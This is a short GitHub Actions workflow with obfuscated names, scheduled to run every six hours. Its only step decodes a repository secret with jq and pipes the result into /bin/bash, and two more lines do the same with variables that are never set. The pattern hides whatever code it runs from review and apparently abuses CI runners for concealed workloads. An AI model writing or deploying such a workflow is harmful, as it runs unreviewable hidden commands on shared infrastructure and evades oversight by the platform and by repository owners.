name: dongaoxiong6715
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongaoxiong6715
        env:
          sqze5: ${{ secrets.sqze5 }}
        run: |
          echo $sqze5 | jq -r .o9612 | /bin/bash
          echo $zcnd887 | jq -r .pb697 | /bin/bash
          echo $fclbi1406 | jq -r .fithr5013 | /bin/bash

